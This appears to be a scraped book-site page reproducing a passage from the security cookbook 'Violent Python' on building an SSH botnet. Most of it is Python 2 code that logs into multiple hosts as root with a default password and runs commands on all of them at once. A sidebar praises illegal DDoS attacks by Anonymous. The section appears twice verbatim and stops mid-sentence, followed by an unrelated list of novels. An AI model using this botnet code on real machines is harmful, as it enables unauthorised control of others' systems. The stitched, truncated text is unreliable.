Free Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by TJ O'Connor
Authors: TJ O'Connor
tmp/002dcb29411aac8087bcfde2b6d2d176-27637
[-] Testing keyfile tmp/003796063673f0b7feac213b265753ea-13516
[∗] Exiting: Key Found.
Constructing the SSH Botnet
Now that we have demonstrated we can control a host via SSH, let us expand it to control multiple hosts simultaneously. Attackers often use collections of compromised computers for malicious purposes. We call this a botnet because the compromised computers act like bots to carry out instructions.
From The Trenches
A Voluntary Botnet
The hacker group, Anonymous, routinely employs the use of a voluntary botnet against their adversaries. In this capacity, the hacker group asks its members to download a tool known as Low Orbit Ion Cannon (LOIC). As a collective, the members of Anonymous launch a distributed botnet attack against sites they deem adversaries. While arguably illegal, the acts of the Anonymous group have had some notable and morally victorious successes. In a recent operation, Operation #Darknet, Anonymous used its voluntary botnet to overwhelm the hosting resources of a site dedicated to distributing child pornography.
In order to construct our botnet, we will have to introduce a new concept—a class. The concept of
a class
serves as the basis for a programming model named, object oriented programming. In this system, we instantiate individual objects with associated methods. For our botnet, each individual bot or client will require the ability to connect, and issue a command.
import optparse
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except Exception, e:
print e
print ‘[-] Error Connecting’
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
Examine the code to produce the class object Client(). To build the client requires the hostname, username, and password or key. Furthermore, the class contains the methods required to sustain a client—connect(), send_command(), alive(). Notice that when we reference a variable belonging to a class, we call it self-followed by the variable name. To construct the botnet, we build a global array named botnet and this array contains the individual client objects. Next, we build a function named addClient() that takes a host, user,and password as input to instantiates a client object and add it to the botnet array. Next, the botnetCommand() function takes an argument of a command. This function iterates through the entire array and sends the command to each client in the botnet array.
import optparse
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except Exception, e:
print e
print ‘[-] Error Connecting’
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print ‘[∗] Output from ’ + client.host
print ‘[+] ’ + output + ‘\n’
def addClient(host, user, password):
client = Client(host, user, password)
botNet.append(client)
botNet = []
addClient(‘10.10.10.110’, ‘root’, ‘toor’)
addClient(‘10.10.10.120’, ‘root’, ‘toor’)
addClient(‘10.10.10.130’, ‘root’, ‘toor’)
botnetCommand(‘uname -v’)
botnetCommand(‘cat /etc/issue’)
By wrapping everything up, we have
[-] Testing keyfile tmp/003796063673f0b7feac213b265753ea-13516
[∗] Exiting: Key Found.
Constructing the SSH Botnet
Now that we have demonstrated we can control a host via SSH, let us expand it to control multiple hosts simultaneously. Attackers often use collections of compromised computers for malicious purposes. We call this a botnet because the compromised computers act like bots to carry out instructions.
From The Trenches
A Voluntary Botnet
The hacker group, Anonymous, routinely employs the use of a voluntary botnet against their adversaries. In this capacity, the hacker group asks its members to download a tool known as Low Orbit Ion Cannon (LOIC). As a collective, the members of Anonymous launch a distributed botnet attack against sites they deem adversaries. While arguably illegal, the acts of the Anonymous group have had some notable and morally victorious successes. In a recent operation, Operation #Darknet, Anonymous used its voluntary botnet to overwhelm the hosting resources of a site dedicated to distributing child pornography.
In order to construct our botnet, we will have to introduce a new concept—a class. The concept of
a class
serves as the basis for a programming model named, object oriented programming. In this system, we instantiate individual objects with associated methods. For our botnet, each individual bot or client will require the ability to connect, and issue a command.
import optparse
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except Exception, e:
print e
print ‘[-] Error Connecting’
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
Examine the code to produce the class object Client(). To build the client requires the hostname, username, and password or key. Furthermore, the class contains the methods required to sustain a client—connect(), send_command(), alive(). Notice that when we reference a variable belonging to a class, we call it self-followed by the variable name. To construct the botnet, we build a global array named botnet and this array contains the individual client objects. Next, we build a function named addClient() that takes a host, user,and password as input to instantiates a client object and add it to the botnet array. Next, the botnetCommand() function takes an argument of a command. This function iterates through the entire array and sends the command to each client in the botnet array.
import optparse
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except Exception, e:
print e
print ‘[-] Error Connecting’
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print ‘[∗] Output from ’ + client.host
print ‘[+] ’ + output + ‘\n’
def addClient(host, user, password):
client = Client(host, user, password)
botNet.append(client)
botNet = []
addClient(‘10.10.10.110’, ‘root’, ‘toor’)
addClient(‘10.10.10.120’, ‘root’, ‘toor’)
addClient(‘10.10.10.130’, ‘root’, ‘toor’)
botnetCommand(‘uname -v’)
botnetCommand(‘cat /etc/issue’)
By wrapping everything up, we have
Similar Books
All or Nothing
Belladonna Bordeaux
Surgeon at Arms
Richard Gordon
A Change of Fortune
Sandra Heath
Melody (THE LOGAN FAMILY)
Stacy-Deanne
Witness to a Trial
John Grisham
The One Thing
Marci Lyn Curtis
Heartland Courtship
Lyn Cote
Y: A Novel
Marjorie Celona
Leap
Jodi Lundgren
Shark Girl
Kelly Bingham